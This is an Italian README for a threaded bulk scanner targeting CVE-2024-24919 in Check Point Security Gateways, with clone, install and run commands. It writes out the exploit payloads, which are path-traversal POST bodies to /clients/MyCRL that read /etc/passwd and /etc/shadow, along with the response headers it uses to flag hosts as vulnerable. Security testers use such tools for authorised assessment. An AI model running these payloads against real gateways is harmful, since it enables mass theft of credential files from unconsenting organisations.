
CVE-2024-24919 [Divulgazione di informazioni del gateway di sicurezza Check Point]
CVE-2024-24919 [Divulgazione di informazioni sul Check Point Security Gateway]
Script basato su e credito va a: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Questo script Python scansiona un elenco di URL per la vulnerabilità CVE-2024-24919 inviando specifiche richieste POST e controllando gli header di risposta e lo status code. Registra i dettagli della richiesta e della risposta e identifica gli URL vulnerabili in base a criteri predefiniti.

[!WARNING] Inteso solo per scopi educativi e test in ambienti aziendali. https://x.com/__nav1n_/ https://github.com/ifconfig-me non si assume alcuna responsabilità per il codice, usalo a tuo rischio. Non attaccare un bersaglio per il quale non hai il permesso di interagire.
[!NOTE] Threading: La nuova versione v2 ora è in grado di funzionare con il threading. Lo script crea 50 thread per elaborare gli URL contemporaneamente per una scansione più veloce e questo threading può essere controllato con
-t100. Coda: Viene utilizzata una coda per gestire gli URL e distribuirli ai thread worker. Avanzamento e Risultati: Lo script stampa l'avanzamento e i risultati utilizzando output colorato.
requeststermcolorClona il repository:
git clone https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner.git
cd CVE-2024-24919-Bulk-Scanner
Installa le librerie richieste:
pip install requests termcolor
Prepara un file con l'elenco degli URL:
Crea un file di testo (es. urls.txt) con un URL per riga. Assicurati che ogni URL inizi con https://. Esempio:
https://example.com
https://testsite.com
https://vulnerable.com
https://123.456.789.10:8080
Esegui lo script:
python CVE-2024-24919-auto-v2.py -t 150 -f urls.txt
Controlla l'output:
Lo script stamperà l'avanzamento della scansione e i risultati nel terminale. Gli URL vulnerabili verranno identificati con il messaggio Vulnerable URL found:.
Risultati:
request-analyze.txt e request-analyze-v2.txt nella versione v2.checkpoint-results.txt e checkpoint-results-v2.txt nella versione v2.Lo script invia richieste POST all'endpoint /clients/MyCRL di ogni URL con due payload:
aCSHELL/../../../../../../../etc/passwdaCSHELL/../../../../../../../etc/shadowControlla gli header di risposta per i seguenti criteri:
Server: Check Point SVN foundationX-UA-Compatible: IE=EmulateIE7X-Frame-Options: SAMEORIGINHTTP/1.0 200 OKSe la risposta soddisfa uno qualsiasi dei tre criteri sopra, l'URL viene considerato vulnerabile.
